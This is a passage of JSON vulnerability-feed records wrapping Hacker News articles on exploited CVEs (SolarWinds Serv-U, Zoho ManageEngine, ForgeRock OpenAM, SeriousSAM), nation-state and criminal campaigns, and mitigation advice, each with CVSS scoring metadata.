{"lastseen": "2022-12-14T04:09:19", "description": "Microsoft is warning of an uptick among nation-state and criminal actors increasingly 
leveraging publicly disclosed zero-day vulnerabilities to breach target environments.\n\nThe tech giant, in its 114-page [Digital Defense Report](<https://www.microsoft.com/en-us/security/business/microsoft-digital-defense-report-2022>), said it has \"observed a reduction in the time between the announcement of a vulnerability and the commoditization of that vulnerability,\" making it imperative that organizations patch such flaws in a timely manner.\n\nThis corroborates an April 2022 advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which [found](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) that bad actors are \"aggressively\" targeting newly disclosed software bugs against broad targets globally.\n\nMicrosoft noted that it only takes 14 days on average for an exploit to be available in the wild after public disclosure of a flaw, stating that while zero-day attacks are initially limited in scope, they tend to be swiftly adopted by other threat actors, leading to indiscriminate probing events before the patches are installed.\n\nIt further accused Chinese state-sponsored groups of being \"particularly proficient\" at discovering and developing zero-day exploits.\n\nThis has been compounded by the fact that the Cyberspace Administration of China (CAC) enacted a new [vulnerability reporting regulation](<https://thehackernews.com/2021/07/chinas-new-law-requires-researchers-to.html>) in September 2021 that requires security flaws to be reported to the government before they are shared with the product developers.\n\nRedmond further said the law could enable government-backed elements to stockpile and weaponize 
the reported bugs, resulting in the increased use of zero-days for espionage activities designed to advance China's economic and military interests.\n\nSome of the vulnerabilities that were first exploited by Chinese actors before being picked up by other adversarial groups include:\n\n * [**CVE-2021-35211**](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>) (CVSS score: 10.0) - A remote code execution flaw in SolarWinds Serv-U Managed File Transfer Server and Serv-U Secure FTP software that was exploited by DEV-0322.\n * [**CVE-2021-40539**](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) (CVSS score: 9.8) - An authentication bypass flaw in Zoho ManageEngine ADSelfService Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-44077**](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) - An unauthenticated remote code execution flaw in Zoho ManageEngine ServiceDesk Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-42321**](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>) (CVSS score: 8.8) - A remote code execution flaw in Microsoft Exchange Server that was exploited three days after it was revealed during the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) hacking contest on October 16-17, 2021.\n * [**CVE-2022-26134**](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) (CVSS score: 9.8) - An Object-Graph Navigation Language (OGNL) injection flaw in Atlassian Confluence that's likely to have been leveraged by a China-affiliated actor against an unnamed U.S. 
entity days before the flaw's disclosure on June 2.\n\nThe findings also come almost a month after CISA released a list of [top vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-279a>) weaponized by China-based actors since 2020 to steal intellectual property and develop access into sensitive networks.\n\n\"Zero-day vulnerabilities are a particularly effective means for initial exploitation and, once publicly exposed, vulnerabilities can be rapidly reused by other nation-state and criminal actors,\" the company said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-05T06:00:00", "type": "thn", "title": "Microsoft Warns of Uptick in Hackers Leveraging Publicly-Disclosed 0-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539", "CVE-2021-42321", "CVE-2021-44077", "CVE-2022-26134"], "modified": "2022-12-14T04:04:34", 
"id": "THN:FD9FEFEA9EB66115FF4BAECDD8C520CB", "href": "https://thehackernews.com/2022/11/microsoft-warns-of-uptick-in-hackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "Microsoft on Tuesday disclosed that the latest string of attacks targeting SolarWinds Serv-U managed file transfer service with a now-patched remote code execution (RCE) exploit is the handiwork of a Chinese threat actor dubbed \"DEV-0322.\"\n\nThe revelation comes days after the Texas-based IT monitoring software maker issued fixes for the flaw that could enable adversaries to remotely run arbitrary code with privileges, allowing them to perform actions such as installing and running malicious payloads or viewing and altering sensitive data.\n\nTracked as [CVE-2021-35211](<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>), the RCE flaw resides in Serv-U's implementation of the Secure Shell (SSH) protocol. While it was previously revealed that the attacks were limited in scope, SolarWinds said it's \"unaware of the identity of the potentially affected customers.\"\n\nAttributing the intrusions with high confidence to DEV-0322 (short for \"Development Group 0322\") based on observed victimology, tactics, and procedures, Microsoft Threat Intelligence Center (MSTIC) said the adversary is known for targeting entities in the U.S. 
Defense Industrial Base Sector and software companies.\n\n\"This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,\" [according](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) to MSTIC, which discovered the zero-day after it detected as many as six anomalous malicious processes being spawned from the main Serv-U process, suggesting a compromise.\n\nThe development also marks the second time a China-based hacking group has exploited vulnerabilities in SolarWinds software as a fertile field for targeted attacks against corporate networks.\n\nBack in December 2020, Microsoft disclosed that a [separate espionage group](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. The intrusions have since been attributed to a China-linked threat actor called [Spiral](<https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html>).\n\nAdditional indicators of compromise associated with the attack can be accessed from SolarWinds' revised advisory [here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n**Update:** This article has been updated to reflect that attackers didn't exploit the SolarWinds flaw to target defense and software companies. As of now, no information has been provided on who was attacked during this zero-day attack.\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T03:41:00", "type": "thn", "title": "Chinese Hackers Exploited Latest SolarWinds 0-Day in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-14T17:24:08", "id": "THN:05251A4D0E47381FEC6EC98D27F46C16", "href": "https://thehackernews.com/2021/07/chinese-hackers-exploit-latest.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:07", "description": "At least nine entities across the technology, defense, healthcare, energy, and education industries were compromised by 
leveraging a [recently patched critical vulnerability](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) in Zoho's ManageEngine ADSelfService Plus self-service password management and single sign-on (SSO) solution.\n\nThe spying campaign, which was observed starting September 22, 2021, involved the threat actor taking advantage of the flaw to gain initial access to targeted organizations, before moving laterally through the network to carry out post-exploitation activities by deploying malicious tools designed to harvest credentials and exfiltrate sensitive information via a backdoor.\n\n\"The actor heavily relies on the Godzilla web shell, uploading several variations of the open-source web shell to the compromised server over the course of the operation,\" researchers from Palo Alto Networks' Unit 42 threat intelligence team [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) in a report. \"Several other tools have novel characteristics or have not been publicly discussed as being used in previous attacks, specifically the NGLite backdoor and the KdcSponge stealer.\"\n\nTracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), the vulnerability is an authentication bypass affecting [REST API](<https://en.wikipedia.org/wiki/Representational_state_transfer>) URLs that could enable remote code execution, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to warn of active exploitation attempts in the wild. The security shortcoming has been rated 9.8 out of 10 in severity.\n\nReal-world attacks weaponizing the bug are said to have commenced as early as August 2021, according to CISA, the U.S. 
Federal Bureau of Investigation (FBI), and the Coast Guard Cyber Command (CGCYBER).\n\nUnit 42's investigation into the attack campaign found that successful initial exploitation activities were consistently followed by the installation of a Chinese-language JSP web shell named \"[Godzilla](<https://github.com/BeichenDream/Godzilla/>),\" with select victims also infected with a custom Golang-based open-source Trojan called \"[NGLite](<https://github.com/Maka8ka/NGLite>).\"\n\n\"NGLite is characterized by its author as an 'anonymous cross-platform remote control program based on blockchain technology,'\" researchers Robert Falcone, Jeff White, and Peter Renals explained. \"It leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\"\n\nIn subsequent steps, the toolset enabled the attacker to run commands and move laterally to other systems on the network, while simultaneously transmitting files of interest. Also deployed in the kill chain is a novel password-stealer dubbed \"KdcSponge\" orchestrated to steal credentials from domain controllers.\n\nUltimately, the adversary is believed to have targeted at least 370 Zoho ManageEngine servers in the U.S. alone beginning September 17. 
While the identity of the threat actor remains unclear, Unit 42 said it observed [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between this attacker and [Emissary Panda](<https://thehackernews.com/2021/08/experts-believe-chinese-hackers-are.html>) (aka APT27, TG-3390, BRONZE UNION, Iron Tiger, or LuckyMouse).\n\nMicrosoft, which is also independently tracking the same campaign, tied it to an emerging threat cluster \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>)\" that's operating out of China and has been previously detected exploiting a zero-day flaw in the SolarWinds Serv-U managed file transfer service in July 2021. The Redmond-based company also pointed out the deployment of an implant called \"[Zebracon](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\" that allows the malware to connect to compromised Zimbra email servers with the goal of retrieving additional instructions.\n\n\"Organizations that identify any activity related to ManageEngine ADSelfService Plus indicators of compromise within their networks should take action immediately,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>), in addition to recommending \"domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets if any indication is found that the '[NTDS.dit](<https://attack.mitre.org/techniques/T1003/003/>)' file was compromised.\"
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T14:39:00", "type": "thn", "title": "Experts Detail Malicious Code Dropped Using ManageEngine ADSelfService Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T03:15:09", "id": "THN:D0F9B64B55AE6B07B3B0C0540189389E", "href": "https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-17T15:04:01", "description": "A persistent intrusion campaign has set its eyes on telecommunications and 
business process outsourcing (BPO) companies at least since June 2022.\n\n\"The end objective of this campaign appears to be to gain access to mobile carrier networks and, as evidenced in two investigations, perform [SIM swapping](<https://en.wikipedia.org/wiki/SIM_swap_scam>) activity,\" CrowdStrike researcher Tim Parisi [said](<https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/>) in an analysis published last week.\n\nThe financially motivated attacks have been attributed by the cybersecurity company to an actor tracked as Scattered Spider.\n\nInitial access to the target environment is said to be gained through a variety of methods, including social engineering by phone calls and Telegram messages in which the attackers impersonate IT personnel.\n\nThis technique is leveraged to direct victims to a credential harvesting site or trick them into installing commercial remote monitoring and management (RMM) tools like Zoho Assist and Getscreen.me.\n\nShould the target accounts be secured by two-factor authentication (2FA), the threat actor either convinced the victim to share the one-time password or employed a technique called prompt bombing, which was put to use in the recent breaches of [Cisco](<https://thehackernews.com/2022/08/cisco-confirms-its-been-hacked-by.html>) and [Uber](<https://thehackernews.com/2022/09/uber-blames-lapsus-hacking-group-for.html>).\n\nIn an alternative infection chain observed by CrowdStrike, a user's stolen credentials previously obtained through unknown means were used by the adversary to authenticate to the organization's Azure tenant.\n\nAnother instance involved the exploitation of a now-patched 
critical remote code execution bug in the ForgeRock OpenAM access management solution ([CVE-2021-35464](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>)) that came under active exploitation last year.\n\nMany of the attacks further entailed gaining access to the compromised entity's multi-factor authentication (MFA) console to enroll their own devices and assign them to the users whose credentials had been previously captured.\n\nThis technique allowed Scattered Spider to establish a deeper level of persistence through legitimate remote access tools such as AnyDesk, LogMeIn, and ConnectWise Control (formerly ScreenConnect) to avoid raising red flags.\n\nInitial access and persistence steps are followed by reconnaissance of Windows, Linux, Google Workspace, Azure Active Directory, Microsoft 365, and AWS environments as well as lateral movement, while also downloading additional tools to exfiltrate VPN and MFA enrollment data in select cases.\n\n\"These campaigns are extremely persistent and brazen,\" Parisi noted. \"Once the adversary is contained or operations are disrupted, they immediately move to target other organizations within the telecom and BPO sectors.\"
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-06T11:00:00", "type": "thn", "title": "Telecom and BPO Companies Under Attack by SIM Swapping Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2023-05-17T13:31:26", "id": "THN:8206540196B8702ACC0E342FE035E526", "href": "https://thehackernews.com/2022/12/telcom-and-bpo-companies-under-attack.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "Cybersecurity agencies in Australia and the U.S. 
are [warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability>) of an actively exploited vulnerability impacting ForgeRock's OpenAM access management solution that could be leveraged to execute arbitrary code on an affected system remotely.\n\n\"The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools,\" the organization [said](<https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability>) in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting the flaw.\n\nTracked as [CVE-2021-35464](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>), the issue concerns a pre-authentication remote code execution (RCE) vulnerability in the ForgeRock Access Manager identity and access management tool, and stems from an [unsafe Java deserialization](<https://owasp.org/www-project-top-ten/2017/A8_2017-Insecure_Deserialization>) in the Jato framework used by the software.\n\n\"An attacker exploiting the vulnerability will execute commands in the context of the current user, not as the root user (unless ForgeRock AM is running as the root user, which is not recommended),\" the San Francisco-headquartered software firm [noted](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) in an advisory.\n\n\"An attacker can use the code execution to extract credentials and certificates, or to gain a further foothold on the host by staging some kind of shell (such as the common implant Cobalt Strike),\" it 
added.\n\nThe vulnerability affects versions 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and has been addressed in version AM 7 released on June 29, 2021. ForgeRock customers are advised to move quickly to deploy the patches to mitigate the risk associated with the flaw.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T04:48:00", "type": "thn", "title": "Critical RCE Flaw in ForgeRock Access Manager Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-13T04:52:02", "id": "THN:6510A3250EDBD304F93AA770592A8D14", "href": "https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:18", "description": "Microsoft Windows 10 and Windows 11 users are at risk of a new unpatched vulnerability that was recently disclosed publicly.\n\nAs we reported last week, the vulnerability \u2014 [SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) \u2014 allows attackers with low-level permissions to access Windows system files to perform a Pass-the-Hash (and potentially Silver Ticket) attack.\n\nAttackers can exploit this vulnerability to obtain hashed passwords stored in the Security Account Manager (SAM) and Registry, and ultimately run arbitrary code with SYSTEM privileges.\n\nThe SeriousSAM vulnerability, tracked as **CVE-2021-36934**, exists in the default configuration of Windows 10 and Windows 11, specifically due to a setting that grants 'read' permissions to the built-in Users group, which contains all local users.\n\nAs a result, built-in local users have access to read the SAM files and the Registry, where they can also view the hashes. Once the attacker has 'User' access, they can use a tool such as Mimikatz to gain access to the Registry or SAM, steal the hashes and convert them to passwords. Compromising domain users this way will give attackers elevated privileges on the network.\n\nBecause there is no official patch available yet from Microsoft, the best way to protect your environment from the SeriousSAM vulnerability is to implement hardening measures.\n\n## Mitigating SeriousSAM\n\nAccording to Dvir Goren, CTO at CalCom, there are three optional hardening measures:\n\n 1. **Delete all users from the built-in Users group** \u2014 this is a good place to start from, but won't protect you if Administrator credentials are stolen.\n 2. 
**Restrict SAM files and Registry permissions** \u2014 allow access only for Administrators. This will, again, only solve part of the problem: if an attacker steals Admin credentials, you will still be exposed to this vulnerability.\n 3. **Don't allow the storage of passwords and credentials for network authentication** \u2014 this rule is also recommended in the [CIS benchmarks](<https://www.calcomsoftware.com/cis-hardening-and-configuration-security-guide/>). By implementing this rule, there will be no hash stored in the SAM or registry, thereby mitigating this vulnerability completely.\n\nWhen using GPOs for implementation, make sure the setting at the following UI path is Enabled:\n\n> Computer Configuration\\Policies\\Windows Settings\\Security Settings\\Local Policies\\Security Options\\Network access: Do not allow storage of passwords and credentials for network authentication\n\n_Despite the fact that the last recommendation offers a good solution for SeriousSAM, it may negatively impact your production if not properly tested before it is pushed. When this setting is enabled, applications that use scheduled tasks and need to store users' hashes locally will fail._\n\n## Mitigating SeriousSAM without risking damage to production\n\nThe following are Dvir's recommendations for mitigating without causing downtime:\n\n 1. Set up a test environment that will simulate your production environment. Simulate all possible dependencies of your network as accurately as you can.\n 2. Analyze the impact of this rule on your test environment. In this way, if you have applications that rely on hashes that are stored locally, you'll know in advance and prevent production downtime.\n 3. Push the policy where possible. Make sure new machines are also hardened and that the configuration doesn't drift over time.\n\nThese three tasks are complex and require a lot of resources and in-house expertise. 
Therefore, Dvir's final recommendation is to [automate the entire hardening process](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) to remove the need to perform stages 1, 2 and 3.\n\nHere is what you will gain from a [Hardening Automation Tool](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>):\n\n * Automatically generate the most accurate possible impact analysis report \u2013 hardening automation tools 'learn' your production dependencies and report to you the potential impact of each policy rule.\n * Automatically enforce your policy on your entire production from a single point of control \u2013 using these tools, you won't need to do manual work, such as using GPOs. You can control and be certain all your machines are hardened.\n * Maintain your compliance posture and monitor your machines in real time \u2013 hardening automation tools will monitor your compliance posture, alert on and remediate any unauthorized configuration changes, thereby preventing configuration drift.\n\n[Hardening automation tools](<https://www.calcomsoftware.com?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) will learn the dependencies directly from your network and automatically generate an accurate impact analysis report. A hardening automation tool will also help you orchestrate the implementation and monitoring process.
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T11:21:00", "type": "thn", "title": "How to Mitigate Microsoft Windows 10, 11 SeriousSAM Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T11:21:00", "id": "THN:777A53E3DACA2E9D76D60AB889CFD10F", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-windows-10-11.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:35", "description": "The Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a 
series of spear-phishing campaigns mounted in October and November 2021.\n\nAccording to ESET's [T3 2021 Threat Report](<https://www.welivesecurity.com/2022/02/09/eset-threat-report-t32021/>) shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the foothold to drop additional malware for gathering information about the hosts and other machines in the same network.\n\nAlso tracked under the names The Dukes, Cozy Bear, and Nobelium, the advanced persistent threat group is an infamous cyber-espionage outfit that has been active for more than a decade, with its attacks targeting Europe and the U.S., before it gained widespread attention for the [supply\u2010chain compromise](<https://thehackernews.com/2022/02/new-malware-used-by-solarwinds.html>) of SolarWinds, leading to further infections in several downstream entities, including U.S. government agencies in 2020.\n\nThe spear-phishing attacks commenced with a COVID-19-themed phishing email impersonating the Iranian Ministry of Foreign Affairs and containing an HTML attachment that, when opened, prompts the recipients to open or save what appears to be an ISO disk image file (\"Covid.iso\").\n\nShould the victim opt to open or download the file, \"a small piece of JavaScript decodes the ISO file, which is embedded directly in the HTML attachment.\" The disk image file, in turn, includes an HTML application that's executed using [mshta.exe](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>) to run a piece of PowerShell code that ultimately loads the Cobalt Strike Beacon onto the infected system.\n\nESET also 
characterized APT29's reliance on HTML and ISO disk images (or VHDX files) as a technique designed specifically to evade Mark of the Web ([MOTW](<https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/ms537628\\(v=vs.85\\)>)) protections, a security feature introduced by Microsoft to determine the origin of a file.\n\n\"An ISO disk image doesn't propagate the so-called Mark of the Web to the files inside the disk image,\" the researchers said. \"As such, and even if the ISO were downloaded from the internet, no warning would be displayed to the victim when the HTA is opened.\"\n\nUpon successfully gaining initial access, the threat actor delivered a variety of off-the-shelf tools to query the target's Active Directory ([AdFind](<https://www.joeware.net/freetools/tools/adfind/>)), execute commands on a remote machine over the SMB protocol ([Sharp-SMBExec](<https://github.com/checkymander/Sharp-SMBExec>)), carry out reconnaissance ([SharpView](<https://github.com/tevora-threat/SharpView>)), and even exploit a Windows privilege escalation flaw ([CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)) to carry out follow-on attacks.\n\n\"Recent months have shown that The Dukes are a serious threat to western organizations, especially in the diplomatic sector,\" the researchers noted. \"They are very persistent, have good operational security, and they know how to create convincing phishing messages.\"
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T10:46:00", "type": "thn", "title": "Russian APT Hackers Used COVID-19 Lures to Target European Diplomats", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-02-10T03:04:57", "id": "THN:894809E1ADF0684644DCCDD97F76BC73", "href": "https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-27T06:23:39", "description": "The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be 
